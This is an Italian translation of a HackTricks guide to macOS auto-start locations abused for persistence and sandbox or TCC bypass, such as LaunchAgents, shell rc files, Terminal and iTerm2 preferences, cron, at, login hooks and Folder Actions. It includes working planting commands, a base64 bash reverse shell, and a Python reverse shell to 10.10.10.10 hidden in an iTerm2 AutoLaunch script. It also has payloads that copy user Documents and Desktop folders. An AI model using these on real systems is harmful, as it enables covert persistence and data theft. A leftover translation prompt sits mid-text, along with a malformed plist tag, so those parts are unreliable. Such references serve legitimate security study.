hacktricks/macos-hardening/macos-auto-start-locations.md

72 KiB

Avvio automatico su macOS

{% hint style="success" %} Impara e pratica l'hacking su AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'hacking su GCP: HackTricks Training GCP Red Team Expert (GRTE)

Sostieni HackTricks
{% endhint %}

Questa sezione si basa pesantemente sulla serie di blog Oltre i buoni vecchi LaunchAgents, l'obiettivo è aggiungere ulteriori posizioni di avvio automatico (se possibile), indicare quali tecniche funzionano ancora oggi con l'ultima versione di macOS (13.4) e specificare i permessi necessari.

Bypass della sandbox

{% hint style="success" %} Qui puoi trovare posizioni di avvio utili per il bypass della sandbox che ti permette di semplicemente eseguire qualcosa scrivendolo in un file e aspettando una azione molto comune, un determinato periodo di tempo o un'azione che di solito puoi eseguire da dentro una sandbox senza necessità di permessi di root. {% endhint %}

Launchd

  • Utile per il bypass della sandbox:
  • Bypass TCC: 🔴

Posizioni

  • /Library/LaunchAgents
  • Trigger: Riavvio
  • Richiede privilegi di root
  • /Library/LaunchDaemons
  • Trigger: Riavvio
  • Richiede privilegi di root
  • /System/Library/LaunchAgents
  • Trigger: Riavvio
  • Richiede privilegi di root
  • /System/Library/LaunchDaemons
  • Trigger: Riavvio
  • Richiede privilegi di root
  • ~/Library/LaunchAgents
  • Trigger: Nuovo accesso
  • ~/Library/LaunchDemons
  • Trigger: Nuovo accesso

{% hint style="success" %} Come fatto interessante, launchd ha una lista di proprietà incorporata nella sezione Mach-o __Text.__config che contiene altri servizi ben noti che launchd deve avviare. Inoltre, questi servizi possono contenere RequireSuccess, RequireRun e RebootOnSuccess che significa che devono essere eseguiti e completati con successo.

Ovviamente, non possono essere modificati a causa della firma del codice. {% endhint %}

Descrizione ed Esploito

launchd è il primo processo eseguito dal kernel di OX S all'avvio e l'ultimo a terminare allo spegnimento. Dovrebbe sempre avere il PID 1. Questo processo leggerà ed eseguirà le configurazioni indicate nei plist ASEP in:

  • /Library/LaunchAgents: Agenti per utente installati dall'amministratore
  • /Library/LaunchDaemons: Daemon a livello di sistema installati dall'amministratore
  • /System/Library/LaunchAgents: Agenti per utente forniti da Apple.
  • /System/Library/LaunchDaemons: Daemon a livello di sistema forniti da Apple.

Quando un utente accede, i plist situati in /Users/$USER/Library/LaunchAgents e /Users/$USER/Library/LaunchDemons vengono avviati con i permessi degli utenti connessi.

La differenza principale tra agenti e demoni è che gli agenti vengono caricati quando l'utente accede e i demoni vengono caricati all'avvio del sistema (poiché ci sono servizi come ssh che devono essere eseguiti prima che qualsiasi utente acceda al sistema). Gli agenti possono anche utilizzare l'interfaccia grafica mentre i demoni devono essere eseguiti in background.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.someidentifier</string>
<key>ProgramArguments</key>
<array>
<string>bash -c 'touch /tmp/launched'</string> <!--Prog to execute-->
</array>
<key>RunAtLoad</key><true/> <!--Execute at system startup-->
<key>StartInterval</key>
<integer>800</integer> <!--Execute each 800s-->
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key></false> <!--Re-execute if exit unsuccessful-->
<!--If previous is true, then re-execute in successful exit-->
</dict>
</dict>
</plist>

Ci sono casi in cui è necessario che un agente venga eseguito prima che l'utente effettui l'accesso, questi sono chiamati PreLoginAgents. Ad esempio, questo è utile per fornire tecnologie assistive all'accesso. Possono essere trovati anche in /Library/LaunchAgents (vedi qui un esempio).

{% hint style="info" %} I nuovi file di configurazione dei Daemons o Agents verranno caricati dopo il successivo riavvio o utilizzando launchctl load <target.plist> È anche possibile caricare file .plist senza quell'estensione con launchctl -F <file> (tuttavia quei file plist non verranno caricati automaticamente dopo il riavvio).
È anche possibile scaricare con launchctl unload <target.plist> (il processo a cui fa riferimento verrà terminato),

Per assicurarsi che non ci sia nulla (come un override) che impedisca a un Agente o Daemon di essere eseguito eseguire: sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.smdb.plist {% endhint %}

Elencare tutti gli agenti e i demoni caricati dall'utente corrente:

launchctl list

{% hint style="warning" %} Se un plist è di proprietà di un utente, anche se si trova in cartelle di sistema daemon, il task verrà eseguito come utente e non come root. Questo può prevenire alcuni attacchi di escalation di privilegi. {% endhint%}

Ulteriori informazioni su launchd

launchd è il primo processo in modalità utente che viene avviato dal kernel. L'avvio del processo deve essere riuscito e non può uscire o bloccarsi. È persino protetto da alcuni segnali di terminazione.

Una delle prime cose che launchd farebbe è avviare tutti i daemon come:

  • Daemon temporizzati basati sull'orario di esecuzione:
    • atd (com.apple.atrun.plist): Ha un StartInterval di 30 minuti
    • crond (com.apple.systemstats.daily.plist): Ha StartCalendarInterval per avviarsi alle 00:15
  • Daemon di rete come:
    • org.cups.cups-lpd: Ascolta in TCP (SockType: stream) con SockServiceName: printer
    • Il campo SockServiceName deve essere una porta o un servizio da /etc/services
    • com.apple.xscertd.plist: Ascolta su TCP nella porta 1640
  • Daemon di percorso che vengono eseguiti quando cambia un percorso specificato:
    • com.apple.postfix.master: Controlla il percorso /etc/postfix/aliases
  • Daemon di notifiche IOKit:
    • com.apple.xartstorageremoted: "com.apple.iokit.matching" => { "com.apple.device-attach" => { "IOMatchLaunchStream" => 1 ...
  • Porta Mach:
    • com.apple.xscertd-helper.plist: Indica nell'ingresso MachServices il nome com.apple.xscertd.helper
  • UserEventAgent:
    • Questo è diverso dal precedente. Fa sì che launchd avvii app in risposta a eventi specifici. Tuttavia, in questo caso, il binario principale coinvolto non è launchd ma /usr/libexec/UserEventAgent. Carica plugin dalla cartella con restrizioni SIP /System/Library/UserEventPlugins/ dove ogni plugin indica il suo inizializzatore nella chiave XPCEventModuleInitializer o, nel caso di plugin più vecchi, nel dizionario CFPluginFactories sotto la chiave FB86416D-6164-2070-726F-70735C216EC0 del suo Info.plist.

File di avvio della shell

Articolo: https://theevilbit.github.io/beyond/beyond_0001/
Articolo (xterm): https://theevilbit.github.io/beyond/beyond_0018/

  • Utile per aggirare il sandbox:
  • Bypass TCC:
  • Ma è necessario trovare un'app con un bypass TCC che esegue una shell che carica questi file

Posizioni

  • ~/.zshrc, ~/.zlogin, ~/.zshenv.zwc, ~/.zshenv, ~/.zprofile
    • Trigger: Aprire un terminale con zsh
  • /etc/zshenv, /etc/zprofile, /etc/zshrc, /etc/zlogin
    • Trigger: Aprire un terminale con zsh
    • Richiede privilegi di root
  • ~/.zlogout
    • Trigger: Uscire da un terminale con zsh
  • /etc/zlogout
    • Trigger: Uscire da un terminale con zsh
    • Richiede privilegi di root
  • Potenzialmente altri in: man zsh
  • ~/.bashrc
    • Trigger: Aprire un terminale con bash
  • /etc/profile (non ha funzionato)
  • ~/.profile (non ha funzionato)
  • ~/.xinitrc, ~/.xserverrc, /opt/X11/etc/X11/xinit/xinitrc.d/
    • Trigger: Previsto per essere attivato con xterm, ma non è installato e anche dopo l'installazione viene generato questo errore: xterm: DISPLAY non è impostato

Descrizione ed Esploito

Quando si inizializza un ambiente shell come zsh o bash, vengono eseguiti certi file di avvio. Attualmente macOS utilizza /bin/zsh come shell predefinita. Questa shell viene automaticamente accessa quando viene avviata l'applicazione Terminal o quando un dispositivo viene accesso tramite SSH. Anche se bash e sh sono presenti in macOS, devono essere esplicitamente invocati per essere utilizzati.

La pagina man di zsh, che possiamo leggere con man zsh, ha una lunga descrizione dei file di avvio.

# Example executino via ~/.zshrc
echo "touch /tmp/hacktricks" >> ~/.zshrc

Applicazioni riaperte

{% hint style="danger" %} Configurare lo sfruttamento indicato e fare il logout e il login o addirittura riavviare non ha funzionato per me per eseguire l'applicazione. (L'applicazione non veniva eseguita, forse deve essere in esecuzione quando vengono eseguite queste azioni) {% endhint %}

Writeup: https://theevilbit.github.io/beyond/beyond_0021/

  • Utile per bypassare il sandbox:
  • Bypass TCC: 🔴

Posizione

  • ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist
  • Trigger: Riavvio delle applicazioni riaperte

Descrizione e Sfruttamento

Tutte le applicazioni da riaprire si trovano all'interno del plist ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist

Quindi, per far sì che le applicazioni riaperte lancino la tua, devi semplicemente aggiungere la tua app alla lista.

L'UUID può essere trovato elencando quella directory o con ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'

Per controllare le applicazioni che verranno riaperte puoi fare:

defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
#or
plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist

Per aggiungere un'applicazione a questa lista puoi utilizzare:

# Adding iTerm2
/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist

Preferenze del Terminale

  • Utile per bypassare il sandbox:
  • Bypass TCC:
  • Il Terminale utilizza le autorizzazioni FDA dell'utente che lo utilizza

Posizione

  • ~/Library/Preferences/com.apple.Terminal.plist
  • Trigger: Aprire il Terminale

Descrizione ed Esploito

In ~/Library/Preferences vengono memorizzate le preferenze dell'utente nelle Applicazioni. Alcune di queste preferenze possono contenere una configurazione per eseguire altre applicazioni/script.

Ad esempio, il Terminale può eseguire un comando all'avvio:

Questa configurazione è riflessa nel file ~/Library/Preferences/com.apple.Terminal.plist in questo modo:

[...]
"Window Settings" => {
"Basic" => {
"CommandString" => "touch /tmp/terminal_pwn"
"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf }
"FontAntialias" => 1
"FontWidthSpacing" => 1.004032258064516
"name" => "Basic"
"ProfileCurrentVersion" => 2.07
"RunCommandAsShell" => 0
"type" => "Window Settings"
}
[...]

Quindi, se il plist delle preferenze del terminale nel sistema potesse essere sovrascritto, la funzionalità open può essere utilizzata per aprire il terminale e eseguire quel comando.

Puoi aggiungere questo da cli con:

{% code overflow="wrap" %}

# Add
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist

# Remove
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist

{% endcode %}

Script del Terminale / Altre estensioni di file

  • Utile per aggirare il sandbox:
  • Bypass di TCC:
  • Il Terminale utilizza le autorizzazioni FDA dell'utente che lo utilizza

Posizione

  • Ovunque
  • Trigger: Apri il Terminale

Descrizione & Sfruttamento

Se crei uno script .terminal e lo apri, l'applicazione Terminal verrà automaticamente invocata per eseguire i comandi indicati al suo interno. Se l'applicazione Terminal ha alcuni privilegi speciali (come TCC), il tuo comando verrà eseguito con quei privilegi speciali.

Provalo con:

# Prepare the payload
cat > /tmp/test.terminal << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CommandString</key>
<string>mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents;</string>
<key>ProfileCurrentVersion</key>
<real>2.0600000000000001</real>
<key>RunCommandAsShell</key>
<false/>
<key>name</key>
<string>exploit</string>
<key>type</key>
<string>Window Settings</string>
</dict>
</plist>
EOF

# Trigger it
open /tmp/test.terminal

# Use something like the following for a reverse shell:
<string>echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash;</string>

Puoi anche utilizzare le estensioni .command, .tool, con contenuti di script shell regolari e verranno aperti anche da Terminal.

{% hint style="danger" %} Se il terminale ha Accesso Completo al Disco, sarà in grado di completare quell'azione (nota che il comando eseguito sarà visibile in una finestra del terminale). {% endhint %}

Plugin Audio

Writeup: https://theevilbit.github.io/beyond/beyond_0013/
Writeup: https://posts.specterops.io/audio-unit-plug-ins-896d3434a882

  • Utile per aggirare il sandbox:
  • Bypass TCC: 🟠
  • Potresti ottenere alcuni accessi TCC extra

Posizione

  • /Library/Audio/Plug-Ins/HAL
  • Richiede privilegi di root
  • Trigger: Riavviare coreaudiod o il computer
  • /Library/Audio/Plug-ins/Components
  • Richiede privilegi di root
  • Trigger: Riavviare coreaudiod o il computer
  • ~/Library/Audio/Plug-ins/Components
  • Trigger: Riavviare coreaudiod o il computer
  • /System/Library/Components
  • Richiede privilegi di root
  • Trigger: Riavviare coreaudiod o il computer

Descrizione

Secondo i precedenti writeup è possibile compilare alcuni plugin audio e caricarli.

Plugin QuickLook

Writeup: https://theevilbit.github.io/beyond/beyond_0028/

  • Utile per aggirare il sandbox:
  • Bypass TCC: 🟠
  • Potresti ottenere alcuni accessi TCC extra

Posizione

  • /System/Library/QuickLook
  • /Library/QuickLook
  • ~/Library/QuickLook
  • /Applications/NomeAppQui/Contents/Library/QuickLook/
  • ~/Applications/NomeAppQui/Contents/Library/QuickLook/

Descrizione & Sfruttamento

I plugin QuickLook possono essere eseguiti quando si attiva l'anteprima di un file (premere la barra spaziatrice con il file selezionato in Finder) e è installato un plugin che supporta quel tipo di file.

È possibile compilare il proprio plugin QuickLook, posizionarlo in una delle posizioni precedenti per caricarlo e quindi andare su un file supportato e premere spazio per attivarlo.

Hook di Login/Logout

{% hint style="danger" %} Questo non ha funzionato per me, né con il LoginHook dell'utente né con il LogoutHook di root {% endhint %}

Writeup: https://theevilbit.github.io/beyond/beyond_0022/

  • Utile per aggirare il sandbox:
  • Bypass TCC: 🔴

Posizione

  • È necessario essere in grado di eseguire qualcosa come defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
  • Localizzato in ~/Library/Preferences/com.apple.loginwindow.plist

Sono deprecati ma possono essere utilizzati per eseguire comandi quando un utente accede.

cat > $HOME/hook.sh << EOF
#!/bin/bash
echo 'My is: \`id\`' > /tmp/login_id.txt
EOF
chmod +x $HOME/hook.sh
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh

Questo impostazione è memorizzata in /Users/$USER/Library/Preferences/com.apple.loginwindow.plist

defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
{
LoginHook = "/Users/username/hook.sh";
LogoutHook = "/Users/username/hook.sh";
MiniBuddyLaunch = 0;
TALLogoutReason = "Shut Down";
TALLogoutSavesState = 0;
oneTimeSSMigrationComplete = 1;
}

Per eliminarlo:

defaults delete com.apple.loginwindow LoginHook
defaults delete com.apple.loginwindow LogoutHook

Il file dell'utente root è memorizzato in /private/var/root/Library/Preferences/com.apple.loginwindow.plist

Bypass della sandbox condizionale

{% hint style="success" %} Qui puoi trovare posizioni di avvio utili per il bypass della sandbox che ti consente di eseguire semplicemente qualcosa scrivendola in un file e aspettandoti condizioni non super comuni come programmi specifici installati, azioni o ambienti utente "non comuni". {% endhint %}

Cron

Writeup: https://theevilbit.github.io/beyond/beyond_0004/

  • Utile per il bypass della sandbox:
  • Tuttavia, è necessario essere in grado di eseguire il binario crontab
  • Oppure essere root
  • Bypass TCC: 🔴

Posizione

  • /usr/lib/cron/tabs/, /private/var/at/tabs, /private/var/at/jobs, /etc/periodic/
  • Root richiesto per l'accesso diretto in scrittura. Nessun accesso root richiesto se è possibile eseguire crontab <file>
  • Trigger: Dipende dal lavoro cron

Descrizione ed Esploito

Elencare i lavori cron dell'utente corrente con:

crontab -l

Puoi vedere anche tutti i lavori cron degli utenti in /usr/lib/cron/tabs/ e /var/at/tabs/ (necessita privilegi di root).

In MacOS è possibile trovare diverse cartelle che eseguono script con certa frequenza in:

# The one with the cron jobs is /usr/lib/cron/tabs/
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/

Qui puoi trovare i regolari compiti cron, i compiti at (non molto usati) e i compiti periodici (principalmente utilizzati per pulire i file temporanei). I compiti periodici giornalieri possono essere eseguiti ad esempio con: periodic daily.

Per aggiungere un compito cron utente programmaticamente è possibile utilizzare:

echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
crontab /tmp/cron

iTerm2

Writeup: https://theevilbit.github.io/beyond/beyond_0002/

  • Utile per bypassare il sandbox:
  • Bypass TCC:
  • iTerm2 usato per avere permessi TCC concessi

Posizioni

  • ~/Library/Application Support/iTerm2/Scripts/AutoLaunch
  • Trigger: Apri iTerm
  • ~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt
  • Trigger: Apri iTerm
  • ~/Library/Preferences/com.googlecode.iterm2.plist
  • Trigger: Apri iTerm

Descrizione ed Esploitation

Gli script memorizzati in ~/Library/Application Support/iTerm2/Scripts/AutoLaunch verranno eseguiti. Ad esempio:

cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF
#!/bin/bash
touch /tmp/iterm2-autolaunch
EOF

chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"

Il seguente è il contenuto di un libro di hacking riguardante le tecniche di hacking. Il seguente contenuto è tratto dal file macos-hardening/macos-auto-start-locations.md. Traduci il testo inglese pertinente in italiano e restituisci la traduzione mantenendo esattamente la stessa sintassi markdown e html. Non tradurre cose come codice, nomi di tecniche di hacking, parole relative all'hacking, nomi di piattaforme cloud/SaaS (come Workspace, aws, gcp...), la parola 'leak', pentesting e tag markdown. Inoltre, non aggiungere nulla di extra oltre alla traduzione e alla sintassi markdown.

cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF
#!/usr/bin/env python3
import iterm2,socket,subprocess,os

async def main(connection):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']);
async with iterm2.CustomControlSequenceMonitor(
connection, "shared-secret", r'^create-window$') as mon:
while True:
match = await mon.async_get()
await iterm2.Window.async_create(connection)

iterm2.run_forever(main)
EOF

Lo script ~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt verrà eseguito:

do shell script "touch /tmp/iterm2-autolaunchscpt"

Il file delle preferenze di iTerm2 situato in ~/Library/Preferences/com.googlecode.iterm2.plist può indicare un comando da eseguire quando il terminale di iTerm2 viene aperto.

Questa impostazione può essere configurata nelle impostazioni di iTerm2:

E il comando è riflesso nelle preferenze:

plutil -p com.googlecode.iterm2.plist
{
[...]
"New Bookmarks" => [
0 => {
[...]
"Initial Text" => "touch /tmp/iterm-start-command"

Puoi impostare il comando da eseguire con:

{% code overflow="wrap" %}

# Add
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist

# Call iTerm
open /Applications/iTerm.app/Contents/MacOS/iTerm2

# Remove
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist

{% endcode %}

{% hint style="warning" %} Molto probabilmente ci sono altri modi per abusare delle preferenze di iTerm2 per eseguire comandi arbitrari. {% endhint %}

xbar

Writeup: https://theevilbit.github.io/beyond/beyond_0007/

  • Utile per aggirare il sandbox:
  • Ma xbar deve essere installato
  • Bypass TCC:
  • Richiede i permessi di Accessibilità

Posizione

  • ~/Library/Application\ Support/xbar/plugins/
  • Trigger: Una volta che xbar è eseguito

Descrizione

Se il popolare programma xbar è installato, è possibile scrivere uno script shell in ~/Library/Application\ Support/xbar/plugins/ che verrà eseguito quando xbar viene avviato:

cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF
#!/bin/bash
touch /tmp/xbar
EOF
chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"

Hammerspoon

Descrizione: https://theevilbit.github.io/beyond/beyond_0008/

  • Utile per bypassare il sandbox:
  • Ma Hammerspoon deve essere installato
  • Bypass TCC:
  • Richiede i permessi di accessibilità

Posizione

  • ~/.hammerspoon/init.lua
  • Trigger: Una volta eseguito Hammerspoon

Descrizione

Hammerspoon funge da piattaforma di automazione per macOS, sfruttando il linguaggio di scripting LUA per le sue operazioni. In particolare, supporta l'integrazione di codice AppleScript completo e l'esecuzione di script shell, migliorando significativamente le sue capacità di scripting.

L'app cerca un singolo file, ~/.hammerspoon/init.lua, e quando viene avviato lo script verrà eseguito.

mkdir -p "$HOME/.hammerspoon"
cat > "$HOME/.hammerspoon/init.lua" << EOF
hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2")
EOF

BetterTouchTool

  • Utile per bypassare il sandbox:
  • Ma BetterTouchTool deve essere installato
  • Bypass TCC:
  • Richiede le autorizzazioni Automazione-Scorciatoie e Accessibilità

Posizione

  • ~/Library/Application Support/BetterTouchTool/*

Questo strumento consente di indicare le applicazioni o script da eseguire quando vengono premute alcune scorciatoie. Un attaccante potrebbe configurare la propria scorciatoia e azione da eseguire nel database per far eseguire codice arbitrario (una scorciatoia potrebbe essere semplicemente premere un tasto).

Alfred

  • Utile per bypassare il sandbox:
  • Ma Alfred deve essere installato
  • Bypass TCC:
  • Richiede le autorizzazioni Automazione, Accessibilità e persino Accesso Completo al Disco

Posizione

  • ???

Consente di creare flussi di lavoro che possono eseguire codice quando vengono soddisfatte determinate condizioni. Potenzialmente un attaccante potrebbe creare un file di flusso di lavoro e farlo caricare ad Alfred (è necessario pagare la versione premium per utilizzare i flussi di lavoro).

SSHRC

Writeup: https://theevilbit.github.io/beyond/beyond_0006/

  • Utile per bypassare il sandbox:
  • Ma ssh deve essere abilitato e utilizzato
  • Bypass TCC:
  • SSH ha accesso FDA

Posizione

  • ~/.ssh/rc
  • Trigger: Accesso tramite ssh
  • /etc/ssh/sshrc
  • Richiede privilegi di root
  • Trigger: Accesso tramite ssh

{% hint style="danger" %} Per attivare ssh è necessario l'Accesso Completo al Disco:

sudo systemsetup -setremotelogin on

{% endhint %}

Descrizione & Sfruttamento

Per impostazione predefinita, a meno che PermitUserRC no in /etc/ssh/sshd_config, quando un utente effettua il login tramite SSH gli script /etc/ssh/sshrc e ~/.ssh/rc verranno eseguiti.

Elementi di Login

Writeup: https://theevilbit.github.io/beyond/beyond_0003/

  • Utile per aggirare il sandbox:
  • Ma è necessario eseguire osascript con argomenti
  • Bypass TCC: 🔴

Posizioni

  • ~/Library/Application Support/com.apple.backgroundtaskmanagementagent
  • Trigger: Login
  • Payload di exploit memorizzato chiamando osascript
  • /var/db/com.apple.xpc.launchd/loginitems.501.plist
  • Trigger: Login
  • Richiede privilegi di root

Descrizione

In Preferenze di Sistema -> Utenti e Gruppi -> Elementi di Login è possibile trovare elementi da eseguire quando l'utente effettua il login.
È possibile elencarli, aggiungerli e rimuoverli dalla riga di comando:

#List all items:
osascript -e 'tell application "System Events" to get the name of every login item'

#Add an item:
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'

#Remove an item:
osascript -e 'tell application "System Events" to delete login item "itemname"'

Questi elementi sono memorizzati nel file ~/Library/Application Support/com.apple.backgroundtaskmanagementagent

Gli elementi di accesso possono anche essere indicati utilizzando l'API SMLoginItemSetEnabled che memorizzerà la configurazione in /var/db/com.apple.xpc.launchd/loginitems.501.plist

ZIP come elemento di accesso

(Controlla la sezione precedente sugli Elementi di Accesso, questa è un'estensione)

Se si memorizza un file ZIP come un Elemento di Accesso, l'Utility Archivio lo aprirà e se ad esempio lo ZIP fosse memorizzato in ~/Library e contenesse la cartella LaunchAgents/file.plist con un backdoor, quella cartella verrà creata (non lo è di default) e il plist verrà aggiunto in modo che la prossima volta che l'utente effettuerà nuovamente l'accesso, il backdoor indicato nel plist verrà eseguito.

Un'altra opzione sarebbe creare i file .bash_profile e .zshenv all'interno della HOME dell'utente in modo che se la cartella LaunchAgents esiste già, questa tecnica funzionerebbe comunque.

At

Articolo: https://theevilbit.github.io/beyond/beyond_0014/

  • Utile per aggirare il sandbox:
  • Ma è necessario eseguire at e deve essere abilitato
  • Bypass TCC: 🔴

Posizione

  • È necessario eseguire at e deve essere abilitato

Descrizione

I compiti at sono progettati per programmare compiti one-time da eseguire in determinati momenti. A differenza dei lavori cron, i compiti at vengono rimossi automaticamente dopo l'esecuzione. È fondamentale notare che questi compiti sono persistenti attraverso i riavvii di sistema, contrassegnandoli come potenziali preoccupazioni per la sicurezza in determinate condizioni.

Per default sono disabilitati ma l'utente root può abilitarli con:

sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist

Questo creerà un file in 1 ora:

echo "echo 11 > /tmp/at.txt" | at now+1

Controlla la coda dei lavori utilizzando atq:

sh-3.2# atq
26	Tue Apr 27 00:46:00 2021
22	Wed Apr 28 00:29:00 2021

Di seguito possiamo vedere due lavori pianificati. Possiamo stampare i dettagli del lavoro utilizzando at -c JOBNUMBER

sh-3.2# at -c 26
#!/bin/sh
# atrun uid=0 gid=0
# mail csaby 0
umask 22
SHELL=/bin/sh; export SHELL
TERM=xterm-256color; export TERM
USER=root; export USER
SUDO_USER=csaby; export SUDO_USER
SUDO_UID=501; export SUDO_UID
SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
MAIL=/var/mail/root; export MAIL
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
PWD=/Users/csaby; export PWD
SHLVL=1; export SHLVL
SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
HOME=/var/root; export HOME
LOGNAME=root; export LOGNAME
LC_CTYPE=UTF-8; export LC_CTYPE
SUDO_GID=20; export SUDO_GID
_=/usr/bin/at; export _
cd /Users/csaby || {
echo 'Execution directory inaccessible' >&2
exit 1
}
unset OLDPWD
echo 11 > /tmp/at.txt

{% hint style="warning" %} Se le attività AT non sono abilitate, le attività create non verranno eseguite. {% endhint %}

I file di lavoro possono essere trovati in /private/var/at/jobs/

sh-3.2# ls -l /private/var/at/jobs/
total 32
-rw-r--r--  1 root  wheel    6 Apr 27 00:46 .SEQ
-rw-------  1 root  wheel    0 Apr 26 23:17 .lockfile
-r--------  1 root  wheel  803 Apr 27 00:46 a00019019bdcd2
-rwx------  1 root  wheel  803 Apr 27 00:46 a0001a019bdcd2

Il nome del file contiene la coda, il numero del lavoro e l'ora in cui è programmato per essere eseguito. Ad esempio, prendiamo in considerazione a0001a019bdcd2.

  • a - questa è la coda
  • 0001a - numero del lavoro in esadecimale, 0x1a = 26
  • 019bdcd2 - ora in esadecimale. Rappresenta i minuti trascorsi dall'epoca. 0x019bdcd2 corrisponde a 26991826 in decimale. Moltiplicandolo per 60 otteniamo 1619509560, che corrisponde a GMT: 2021. April 27., Tuesday 7:46:00.

Se stampiamo il file del lavoro, scopriamo che contiene le stesse informazioni ottenute utilizzando at -c.

Azioni della Cartella

Descrizione: https://theevilbit.github.io/beyond/beyond_0024/
Descrizione: https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d

  • Utile per aggirare il sandbox:
  • Ma è necessario essere in grado di chiamare osascript con argomenti per contattare System Events per poter configurare le Azioni della Cartella
  • Bypass TCC: 🟠
  • Ha alcune autorizzazioni TCC di base come Desktop, Documenti e Download

Posizione

  • /Library/Scripts/Folder Action Scripts
  • Richiede privilegi di amministratore
  • Trigger: Accesso alla cartella specificata
  • ~/Library/Scripts/Folder Action Scripts
  • Trigger: Accesso alla cartella specificata

Descrizione ed Esploito

Le Azioni della Cartella sono script attivati automaticamente dai cambiamenti in una cartella come l'aggiunta, la rimozione di elementi o altre azioni come l'apertura o il ridimensionamento della finestra della cartella. Queste azioni possono essere utilizzate per vari compiti e possono essere attivate in modi diversi come utilizzando l'interfaccia utente di Finder o comandi terminali.

Per configurare le Azioni della Cartella, hai opzioni come:

  1. Creare un flusso di lavoro delle Azioni della Cartella con Automator e installarlo come servizio.
  2. Allegare uno script manualmente tramite la Configurazione delle Azioni della Cartella nel menu contestuale di una cartella.
  3. Utilizzare OSAScript per inviare messaggi di Apple Event a System Events.app per configurare programmaticamente un'Azione della Cartella.
  • Questo metodo è particolarmente utile per incorporare l'azione nel sistema, offrendo un livello di persistenza.

Lo script seguente è un esempio di ciò che può essere eseguito da un'Azione della Cartella:

// source.js
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");

Per rendere lo script sopra utilizzabile dalle Azioni Cartella, compilalo usando:

osacompile -l JavaScript -o folder.scpt source.js

Dopo che lo script è compilato, configura le Azioni Cartella eseguendo lo script qui sotto. Questo script abiliterà le Azioni Cartella a livello globale e attaccherà specificamente lo script precedentemente compilato alla cartella Desktop.

// Enabling and attaching Folder Action
var se = Application("System Events");
se.folderActionsEnabled = true;
var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
se.folderActions.push(fa);
fa.scripts.push(myScript);

Esegui lo script di installazione con:

osascript -l JavaScript /Users/username/attach.scpt
